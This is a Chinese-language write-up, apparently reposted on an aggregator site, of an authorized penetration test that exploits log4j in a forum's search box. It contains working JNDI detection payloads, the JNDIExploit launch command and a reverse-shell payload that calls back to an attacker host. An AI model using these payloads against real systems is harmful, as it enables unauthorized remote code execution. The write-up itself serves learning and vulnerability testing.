【实战】一次简单的log4j漏洞测试

这篇具有很好参考价值的文章主要介绍了【实战】一次简单的log4j漏洞测试。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

更新时间:2021.12.19

参考文档:https://www.yuque.com/u8021480/crow/dg9xax
在去年log4j漏洞刚爆发的时候,很多平台都存在漏洞,当时也在第一时间在有授权的情况下对某论坛进行了渗透测试,结果发现存在漏洞,报告之后,漏洞也被很快修复。
本次对该渗透过程进行一个简单的记录,整个过程非常的简单,因为漏洞刚出来,也没有什么waf,所以很快就拿下了。以下过程已进行脱敏,漏洞均已修复。

1. Dnslog漏洞探测

云端攻击机kali : 1x3.xxx.xx2.9
目标机:http://testxxx.cn/
中转文件:JNDIExploit-1.2-SNAPSHOT.jar

1.1 payload描述

log4j漏洞中,一般构造诸如:${jndi:ldap://6bbs.dnslog.cn/test}之类的漏洞,但是在很多时候,因为有//的存在,可能会触发系统自动将其作为url链接访问,导致误判,因此在这里可以使用新的payload进行测试:

${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}

在这里可以显示起版本信息,如果能够显示,则证明一定存在漏洞。

1.2 测试

去dnslog平台申请一个域名:
gx.dnslog.cn

直接构造:

${jndi:ldap://${sys:java.version}.gx.dnslog.cn}

然后在论坛的搜索框执行:

【实战】一次简单的log4j漏洞测试
此时DNSLOG平台有数据,证明存在漏洞:

【实战】一次简单的log4j漏洞测试
既然存在漏洞,那就试试能否拿下RCE

2. log4j RCE

云端攻击机kali : 1x3.xxx.xx2.9
目标机:http://testxxx.com/
中转文件:JNDIExploit-1.2-SNAPSHOT.jar

2.1 准备工作

直接在攻击机上开启JNDIExploit-1.2-SNAPSHOT.jar
命令如下:java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip地址

【实战】一次简单的log4j漏洞测试
通过漏洞探寻得知测试派的搜索框存在log4j漏洞,直接在这里构造exp即可:

${jndi:ldap://攻击机ip:1389/Basic/ReverseShell/攻击机ip/7777}

其中,去请求攻击机的的1389端口,并且将shell反弹给攻击机的7777端口。

在攻击机上另启一个命令行,监听7777端口:
【实战】一次简单的log4j漏洞测试

此时状态如下:

【实战】一次简单的log4j漏洞测试

2.2 攻击测试

直接在输入框里面输入上面构造好的exp
【实战】一次简单的log4j漏洞测试

直接回车,shell就弹回来了:
【实战】一次简单的log4j漏洞测试

判断当前是物理机还是Docker

cat /proc/1/cgroup

【实战】一次简单的log4j漏洞测试
此时显示为物理机。(参考资料:[https://blog.csdn.net/mar_ljh/article/details/109011822](https://blog.csdn.net/mar_ljh/article/details/109011822)

测试结束,开始写报告。

3. 漏洞修复

https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqBQ文章来源地址https://www.toymoban.com/news/detail-425429.html

到了这里,关于【实战】一次简单的log4j漏洞测试的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全 log4j漏洞复现

    前言: log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。 漏洞描述: 由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最

    2024年02月09日
    浏览(61)
  • log4j漏洞原理及攻击流程

    log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。 漏洞地址: Log4j是一种流行的Java日志记录工具,其升级版本Log4j 2存在安全漏洞。这个漏洞是由Log4j 2的lookup功

    2024年02月16日
    浏览(39)
  • fastJson反序列化漏洞和log4j漏洞

    有 attach.class (编译好的文件) 攻击者建立rmi服务端,于rmi服务端建造一系列攻击对象 ,假设远程地址为 http://abc,可url链接到恶意class-attach.class 若被攻击者访问到此服务 rmi://abc/attach.class ,静态代码块会优先加载,无需构造对象。 fastJson通过序列化漏洞 fastJson=1.2.47 (高版本添

    2024年02月16日
    浏览(58)
  • 深入解析著名的阿里云Log4j 漏洞

    几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性

    2024年02月16日
    浏览(53)
  • 【java安全】Log4j反序列化漏洞

    关于Apache Log4j Log4j是Apache的开源项目,可以实现对System.out等打印语句的替代,并且可以结合spring等项目,实现把日志输出到控制台或文件等。而且它还可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码,满足了大多数要求。 就是用来打印日志的 漏洞成因

    2024年02月11日
    浏览(47)
  • 修复中间件log4j漏洞方案(直接更换漏洞jar包)

    后台服务里面的log4j漏洞我们已经全部升级处理了,但是一些中间件镜像包里的log4j漏洞需要单独处理 解决办法以ElasticSearch7.6.2为例: (1)找到容器里面有哪些旧的log4j依赖包 (2)去官网找到对应新版本的依赖包 (3)把新的依赖包复制到和旧的同文件夹下 (4)删除旧的依

    2024年02月10日
    浏览(51)
  • Web网络安全-----Log4j高危漏洞原理及修复

    Web网络安全-----红蓝攻防之信息收集 Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;

    2024年02月10日
    浏览(53)
  • CVE-2021-44228 Apache log4j 远程命令执行漏洞

    一、漏洞原理 log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,

    2024年02月08日
    浏览(55)
  • Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    什么是JNDI JNDI全称为 Java Naming and Directory Interface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。 JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。 简单从安全角度

    2024年02月09日
    浏览(46)
  • Log4j反序列化命令执行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址: ysoserial 利用工具生成payload: 1.创建文件 进入容器内部,查看文件创建成功 2.查看反弹的shell 有点

    2024年02月11日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包